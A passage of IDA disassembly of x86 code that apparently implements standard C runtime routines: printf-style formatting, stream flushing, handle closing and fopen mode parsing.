loc_417FFA: ; CODE XREF: sub_417D6C+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_4180DE
mov [ebp+var_10], 6
jmp loc_4180EC
; ---------------------------------------------------------------------------
loc_41801B: ; CODE XREF: sub_417D6C+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_418027
or byte ptr [ebp+var_4+1], 8
loc_418027: ; CODE XREF: sub_417D6C+2B5�j
; sub_417D6C+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41806E
call sub_418568
push eax
lea eax, [ebp+var_248]
push eax
call sub_41DA2B
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_418081
mov [ebp+var_28], 1
jmp short loc_418081
; ---------------------------------------------------------------------------
loc_418058: ; CODE XREF: sub_417D6C+1FB�j
sub eax, 5Ah
jz short loc_41808F
sub eax, 9
jz short loc_418027
dec eax
jz loc_418251
jmp loc_418376
; ---------------------------------------------------------------------------
loc_41806E: ; CODE XREF: sub_417D6C+2C5�j
call sub_41854B
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_418081: ; CODE XREF: sub_417D6C+2E1�j
; sub_417D6C+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_418376
; ---------------------------------------------------------------------------
loc_41808F: ; CODE XREF: sub_417D6C+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41854B
test eax, eax
pop ecx
jz short loc_4180D0
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4180D0
test byte ptr [ebp+var_4+1], 8
jz short loc_4180C1
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_418376
; ---------------------------------------------------------------------------
loc_4180C1: ; CODE XREF: sub_417D6C+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_418373
; ---------------------------------------------------------------------------
loc_4180D0: ; CODE XREF: sub_417D6C+32F�j
; sub_417D6C+336�j
mov eax, off_4383E8
mov [ebp+var_8], eax
push eax
jmp loc_41816C
; ---------------------------------------------------------------------------
loc_4180DE: ; CODE XREF: sub_417D6C+29D�j
jnz short loc_4180EC
cmp bl, 67h
jnz short loc_4180EC
mov [ebp+var_10], 1
loc_4180EC: ; CODE XREF: sub_417D6C+2AA�j
; sub_417D6C:loc_4180DE�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_43A750
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41813E
cmp [ebp+var_10], 0
jnz short loc_41813E
lea eax, [ebp+var_248]
push eax
call off_43A75C
pop ecx
loc_41813E: ; CODE XREF: sub_417D6C+3BC�j
; sub_417D6C+3C2�j
cmp bl, 67h
jnz short loc_418155
test esi, esi
jnz short loc_418155
lea eax, [ebp+var_248]
push eax
call off_43A754
pop ecx
loc_418155: ; CODE XREF: sub_417D6C+3D5�j
; sub_417D6C+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41816B
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41816B: ; CODE XREF: sub_417D6C+3F0�j
push edi
loc_41816C: ; CODE XREF: sub_417D6C+36D�j
call sub_415B10
pop ecx
jmp loc_418373
; ---------------------------------------------------------------------------
loc_418177: ; CODE XREF: sub_417D6C+1E9�j
sub eax, 69h
jz loc_418251
sub eax, 5
jz loc_418227
dec eax
jz loc_418214
dec eax
jz short loc_4181E4
sub eax, 3
jz loc_417F99
dec eax
dec eax
jz loc_418255
sub eax, 3
jnz loc_418376
mov [ebp+var_2C], 27h
jmp short loc_4181F2
; ---------------------------------------------------------------------------
loc_4181B6: ; CODE XREF: sub_417D6C+270�j
; sub_417D6C+27A�j
sub eax, ecx
sar eax, 1
jmp loc_418373
; ---------------------------------------------------------------------------
loc_4181BF: ; CODE XREF: sub_417D6C+24F�j
test ecx, ecx
jnz short loc_4181CC
mov ecx, off_4383E8
mov [ebp+var_8], ecx
loc_4181CC: ; CODE XREF: sub_417D6C+455�j
mov eax, ecx
loc_4181CE: ; CODE XREF: sub_417D6C+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4181DD
cmp byte ptr [eax], 0
jz short loc_4181DD
inc eax
jmp short loc_4181CE
; ---------------------------------------------------------------------------
loc_4181DD: ; CODE XREF: sub_417D6C+467�j
; sub_417D6C+46C�j
sub eax, ecx
jmp loc_418373
; ---------------------------------------------------------------------------
loc_4181E4: ; CODE XREF: sub_417D6C+425�j
mov [ebp+var_10], 8
loc_4181EB: ; CODE XREF: sub_417D6C+201�j
mov [ebp+var_2C], 7
loc_4181F2: ; CODE XREF: sub_417D6C+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41825C
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41825C
; ---------------------------------------------------------------------------
loc_418214: ; CODE XREF: sub_417D6C+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41825C
or byte ptr [ebp+var_4+1], 2
jmp short loc_41825C
; ---------------------------------------------------------------------------
loc_418227: ; CODE XREF: sub_417D6C+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41854B
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_418240
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_418245
; ---------------------------------------------------------------------------
loc_418240: ; CODE XREF: sub_417D6C+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_418245: ; CODE XREF: sub_417D6C+4D2�j
mov [ebp+var_28], 1
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_418251: ; CODE XREF: sub_417D6C+2F7�j
; sub_417D6C+40E�j
or [ebp+var_4], 40h
loc_418255: ; CODE XREF: sub_417D6C+432�j
mov [ebp+var_C], 0Ah
loc_41825C: ; CODE XREF: sub_417D6C+491�j
; sub_417D6C+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41826E
lea eax, [ebp+arg_8]
push eax
call sub_418558
pop ecx
jmp short loc_4182AF
; ---------------------------------------------------------------------------
loc_41826E: ; CODE XREF: sub_417D6C+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_418295
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41828A
call sub_41854B
pop ecx
movsx eax, ax
loc_418287: ; CODE XREF: sub_417D6C+527�j
; sub_417D6C+539�j
cdq
jmp short loc_4182AF
; ---------------------------------------------------------------------------
loc_41828A: ; CODE XREF: sub_417D6C+510�j
call sub_41854B
pop ecx
movzx eax, ax
jmp short loc_418287
; ---------------------------------------------------------------------------
loc_418295: ; CODE XREF: sub_417D6C+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_4182A7
call sub_41854B
pop ecx
jmp short loc_418287
; ---------------------------------------------------------------------------
loc_4182A7: ; CODE XREF: sub_417D6C+531�j
call sub_41854B
pop ecx
xor edx, edx
loc_4182AF: ; CODE XREF: sub_417D6C+500�j
; sub_417D6C+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4182D0
test edx, edx
jg short loc_4182D0
jl short loc_4182BF
test eax, eax
jnb short loc_4182D0
loc_4182BF: ; CODE XREF: sub_417D6C+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4182D4
; ---------------------------------------------------------------------------
loc_4182D0: ; CODE XREF: sub_417D6C+547�j
; sub_417D6C+54B�j ...
mov esi, eax
mov edi, edx
loc_4182D4: ; CODE XREF: sub_417D6C+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4182DD
and edi, 0
loc_4182DD: ; CODE XREF: sub_417D6C+56C�j
cmp [ebp+var_10], 0
jge short loc_4182EC
mov [ebp+var_10], 1
jmp short loc_4182F0
; ---------------------------------------------------------------------------
loc_4182EC: ; CODE XREF: sub_417D6C+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4182F0: ; CODE XREF: sub_417D6C+57E�j
mov eax, esi
or eax, edi
jnz short loc_4182FA
and [ebp+var_1C], 0
loc_4182FA: ; CODE XREF: sub_417D6C+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_418300: ; CODE XREF: sub_417D6C+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_418310
mov eax, esi
or eax, edi
jz short loc_41834B
loc_418310: ; CODE XREF: sub_417D6C+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_417100
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_417180
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_418341
add ebx, [ebp+var_2C]
loc_418341: ; CODE XREF: sub_417D6C+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_418300
; ---------------------------------------------------------------------------
loc_41834B: ; CODE XREF: sub_417D6C+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_418376
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_418369
test eax, eax
jnz short loc_418376
loc_418369: ; CODE XREF: sub_417D6C+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_418373: ; CODE XREF: sub_417D6C+35F�j
; sub_417D6C+406�j ...
mov [ebp+var_C], eax
loc_418376: ; CODE XREF: sub_417D6C+21B�j
; sub_417D6C+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_418474 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_4183AE
test bh, 1
jz short loc_418393
mov [ebp+var_16], 2Dh
jmp short loc_4183A7
; ---------------------------------------------------------------------------
loc_418393: ; CODE XREF: sub_417D6C+61F�j
test bl, 1
jz short loc_41839E
mov [ebp+var_16], 2Bh
jmp short loc_4183A7
; ---------------------------------------------------------------------------
loc_41839E: ; CODE XREF: sub_417D6C+62A�j
test bl, 2
jz short loc_4183AE
mov [ebp+var_16], 20h
loc_4183A7: ; CODE XREF: sub_417D6C+625�j
; sub_417D6C+630�j
mov [ebp+var_1C], 1
loc_4183AE: ; CODE XREF: sub_417D6C+61A�j
; sub_417D6C+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_4183CE
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4184E2
add esp, 10h
loc_4183CE: ; CODE XREF: sub_417D6C+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_418513
add esp, 10h
test bl, 8
jz short loc_418400
test bl, 4
jnz short loc_418400
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4184E2
add esp, 10h
loc_418400: ; CODE XREF: sub_417D6C+67B�j
; sub_417D6C+680�j
cmp [ebp+var_24], 0
jz short loc_418447
cmp [ebp+var_C], 0
jle short loc_418447
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_418415: ; CODE XREF: sub_417D6C+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41DA2B
pop ecx
test eax, eax
pop ecx
jle short loc_41845C
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_418513
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_418415
jmp short loc_41845C
; ---------------------------------------------------------------------------
loc_418447: ; CODE XREF: sub_417D6C+698�j
; sub_417D6C+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_418513
add esp, 10h
loc_41845C: ; CODE XREF: sub_417D6C+6BC�j
; sub_417D6C+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_418474 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4184E2
add esp, 10h
loc_418474: ; CODE XREF: sub_417D6C+68�j
; sub_417D6C+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_417D98
loc_418485: ; CODE XREF: sub_417D6C+1F�j
; sub_417D6C+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_417D6C endp
; ---------------------------------------------------------------------------
off_41848D dd offset loc_417F0B ; DATA XREF: sub_417D6C+6E�r
dd offset loc_417DE1 ; jump table for switch statement
dd offset loc_417DFC
dd offset loc_417E48
dd offset loc_417E7F
dd offset loc_417E87
dd offset loc_417EBC
dd offset loc_417F4F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184AD proc near ; CODE XREF: sub_417D6C+1BD�p
; sub_417D6C+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_4184C6
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4184D1
; ---------------------------------------------------------------------------
loc_4184C6: ; CODE XREF: sub_4184AD+9�j
push ecx
push [ebp+arg_0]
call sub_417C57
pop ecx
pop ecx
loc_4184D1: ; CODE XREF: sub_4184AD+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4184DE
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4184DE: ; CODE XREF: sub_4184AD+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_4184AD endp
; =============== S U B R O U T I N E =======================================
sub_4184E2 proc near ; CODE XREF: sub_417D6C+65A�p
; sub_417D6C+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_418510
mov esi, [esp+8+arg_C]
loc_4184F3: ; CODE XREF: sub_4184E2+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_4184AD
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_418510
mov eax, edi
dec edi
test eax, eax
jg short loc_4184F3
loc_418510: ; CODE XREF: sub_4184E2+B�j
; sub_4184E2+25�j
pop edi
pop esi
retn
sub_4184E2 endp
; =============== S U B R O U T I N E =======================================
sub_418513 proc near ; CODE XREF: sub_417D6C+670�p
; sub_417D6C+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_418547
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_418529: ; CODE XREF: sub_418513+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_4184AD
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_418547
mov eax, ebx
dec ebx
test eax, eax
jg short loc_418529
loc_418547: ; CODE XREF: sub_418513+C�j
; sub_418513+2B�j
pop edi
pop esi
pop ebx
retn
sub_418513 endp
; =============== S U B R O U T I N E =======================================
sub_41854B proc near ; CODE XREF: sub_417D6C+E5�p
; sub_417D6C+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41854B endp
; =============== S U B R O U T I N E =======================================
sub_418558 proc near ; CODE XREF: sub_417D6C+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_418558 endp
; =============== S U B R O U T I N E =======================================
sub_418568 proc near ; CODE XREF: sub_417D6C+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_418568 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418576 proc near ; CODE XREF: sub_4157F4+17�p
; sub_4157F4+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_418594
mov ecx, off_4383F0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4185E6
; ---------------------------------------------------------------------------
loc_418594: ; CODE XREF: sub_418576+10�j
mov ecx, eax
push esi
mov esi, off_4383F0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4185B9
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4185C2
; ---------------------------------------------------------------------------
loc_4185B9: ; CODE XREF: sub_418576+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4185C2: ; CODE XREF: sub_418576+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41DA93
add esp, 1Ch
test eax, eax
jnz short loc_4185E2
leave
retn
; ---------------------------------------------------------------------------
loc_4185E2: ; CODE XREF: sub_418576+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4185E6: ; CODE XREF: sub_418576+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_418576 endp
; =============== S U B R O U T I N E =======================================
sub_4185EB proc near ; CODE XREF: sub_415960+2A�p
; sub_41DDF6+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_46CF20
jnb loc_418685
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:46CE20h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_418685
push edi
call sub_41DD62
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_418664
cmp edi, 1
jz short loc_418632
cmp edi, 2
jnz short loc_418648
loc_418632: ; CODE XREF: sub_4185EB+40�j
push 2
call sub_41DD62
push 1
mov ebp, eax
call sub_41DD62
pop ecx
cmp eax, ebp
pop ecx
jz short loc_418664
loc_418648: ; CODE XREF: sub_4185EB+45�j
push edi
call sub_41DD62
pop ecx
push eax
call dword_42106C ; CloseHandle
test eax, eax
jnz short loc_418664
call dword_421088 ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_418666
; ---------------------------------------------------------------------------
loc_418664: ; CODE XREF: sub_4185EB+3B�j
; sub_4185EB+5B�j ...
xor ebp, ebp
loc_418666: ; CODE XREF: sub_4185EB+77�j
push edi
call sub_41DCE8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_418681
push ebp
call sub_41CE74
pop ecx
jmp short loc_418696
; ---------------------------------------------------------------------------
loc_418681: ; CODE XREF: sub_4185EB+8B�j
xor eax, eax
jmp short loc_418699
; ---------------------------------------------------------------------------
loc_418685: ; CODE XREF: sub_4185EB+E�j
; sub_4185EB+2F�j
and dword_46BB08, 0
mov dword_46BB04, 9
loc_418696: ; CODE XREF: sub_4185EB+94�j
or eax, 0FFFFFFFFh
loc_418699: ; CODE XREF: sub_4185EB+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4185EB endp
; =============== S U B R O U T I N E =======================================
sub_41869E proc near ; CODE XREF: sub_415960+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_4186C7
test al, 8
jz short loc_4186C7
push dword ptr [esi+8]
call sub_415C9B
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_4186C7: ; CODE XREF: sub_41869E+A�j
; sub_41869E+E�j
pop esi
retn
sub_41869E endp
; =============== S U B R O U T I N E =======================================
sub_4186C9 proc near ; CODE XREF: sub_418769+2D�p
; sub_418769+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4186DB
push esi
call sub_418769
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4186DB: ; CODE XREF: sub_4186C9+7�j
push esi
call sub_418704
test eax, eax
pop ecx
jz short loc_4186EB
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4186EB: ; CODE XREF: sub_4186C9+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_418700
push dword ptr [esi+10h]
call sub_41DD9F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_418700: ; CODE XREF: sub_4186C9+26�j
xor eax, eax
pop esi
retn
sub_4186C9 endp
; =============== S U B R O U T I N E =======================================
sub_418704 proc near ; CODE XREF: sub_415960+1A�p
; sub_416CDE+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_418751
test ax, 108h
jz short loc_418751
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_418751
push edi
push eax
push dword ptr [esi+10h]
call sub_41CCC7
add esp, 0Ch
cmp eax, edi
jnz short loc_41874A
mov eax, [esi+0Ch]
test al, 80h
jz short loc_418751
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_418751
; ---------------------------------------------------------------------------
loc_41874A: ; CODE XREF: sub_418704+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_418751: ; CODE XREF: sub_418704+14�j
; sub_418704+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_418704 endp
; =============== S U B R O U T I N E =======================================
sub_418760 proc near ; CODE XREF: sub_41DA17�p
push 1
call sub_418769
pop ecx
retn
sub_418760 endp
; =============== S U B R O U T I N E =======================================
sub_418769 proc near ; CODE XREF: sub_4186C9+A�p
; sub_418760+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_46CE00, esi
jle short loc_4187C7
loc_41877A: ; CODE XREF: sub_418769+5C�j
mov eax, dword_46BDF8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4187BE
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4187BE
cmp [esp+0Ch+arg_0], 1
jnz short loc_4187A4
push eax
call sub_4186C9
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4187BE
inc ebx
jmp short loc_4187BE
; ---------------------------------------------------------------------------
loc_4187A4: ; CODE XREF: sub_418769+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_4187BE
test cl, 2
jz short loc_4187BE
push eax
call sub_4186C9
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4187BE
or edi, eax
loc_4187BE: ; CODE XREF: sub_418769+1B�j
; sub_418769+23�j ...
inc esi
cmp esi, dword_46CE00
jl short loc_41877A
loc_4187C7: ; CODE XREF: sub_418769+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_4187D2
mov eax, edi
loc_4187D2: ; CODE XREF: sub_418769+65�j
pop edi
pop esi
pop ebx
retn
sub_418769 endp
; =============== S U B R O U T I N E =======================================
sub_4187D6 proc near ; CODE XREF: sub_4159B6+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41D94C
test eax, eax
pop ecx
jz short loc_41885F
cmp esi, offset dword_43AB28
jnz short loc_4187F4
xor eax, eax
jmp short loc_4187FF
; ---------------------------------------------------------------------------
loc_4187F4: ; CODE XREF: sub_4187D6+18�j
cmp esi, offset dword_43AB48
jnz short loc_41885F
push 1
pop eax
loc_4187FF: ; CODE XREF: sub_4187D6+1C�j
inc dword_46BCC8
test word ptr [esi+0Ch], 10Ch
jnz short loc_41885F
cmp dword_46BB5C[eax*4], 0
push ebx
push edi
lea edi, ds:46BB5Ch[eax*4]
mov ebx, 1000h
jnz short loc_418845
push ebx
call sub_415BE9
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_418845
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_418852
; ---------------------------------------------------------------------------
loc_418845: ; CODE XREF: sub_4187D6+4D�j
; sub_4187D6+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_418852: ; CODE XREF: sub_4187D6+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41885F: ; CODE XREF: sub_4187D6+10�j
; sub_4187D6+24�j ...
xor eax, eax
pop esi
retn
sub_4187D6 endp
; =============== S U B R O U T I N E =======================================
sub_418863 proc near ; CODE XREF: sub_4159B6+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41888D
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41889E
push esi
call sub_418704
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41888D: ; CODE XREF: sub_418863+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41889E
push eax
call sub_418704
pop ecx
loc_41889E: ; CODE XREF: sub_418863+10�j
; sub_418863+32�j
pop esi
retn
sub_418863 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188A0 proc near ; CODE XREF: sub_4159E8+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_46BCD0
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_4188D9
cmp al, 72h
jz short loc_4188D2
cmp al, 77h
jnz loc_4189ED
mov ecx, 301h
jmp short loc_4188DE
; ---------------------------------------------------------------------------
loc_4188D2: ; CODE XREF: sub_4188A0+21�j
xor ecx, ecx
or esi, 1
jmp short loc_4188E1
; ---------------------------------------------------------------------------
loc_4188D9: ; CODE XREF: sub_4188A0+1D�j
mov ecx, 109h
loc_4188DE: ; CODE XREF: sub_4188A0+30�j
or esi, 2
loc_4188E1: ; CODE XREF: sub_4188A0+37�j
push 1
pop edx
loc_4188E4: ; CODE XREF: sub_4188A0+8B�j
; sub_4188A0+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_4189D3
cmp edx, ebx
jz loc_4189D3
movsx eax, al
cmp eax, 54h
jg short loc_418972
jz short loc_418962
sub eax, 2Bh
jz short loc_41894C
sub eax, 19h
jz short loc_418942
sub eax, 0Eh
jz short loc_41892D
dec eax
jnz loc_4189C4
cmp [ebp+var_4], ebx
jnz loc_4189C4
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_41892D: ; CODE XREF: sub_4188A0+6F�j
cmp [ebp+var_4], ebx
jnz loc_4189C4
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_418942: ; CODE XREF: sub_4188A0+6A�j
test cl, 40h
jnz short loc_4189C4
or ecx, 40h
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_41894C: ; CODE XREF: sub_4188A0+65�j
test cl, 2
jnz short loc_4189C4
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_4188E4
; ---------------------------------------------------------------------------
loc_418962: ; CODE XREF: sub_4188A0+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_4189C4
or ecx, eax
jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_418972: ; CODE XREF: sub_4188A0+5E�j
sub eax, 62h
jz short loc_4189BF
dec eax
jz short loc_4189A8
sub eax, 0Bh
jz short loc_418991
sub eax, 6
jnz short loc_4189C4
test ch, 0C0h
jnz short loc_4189C4
or ch, 40h
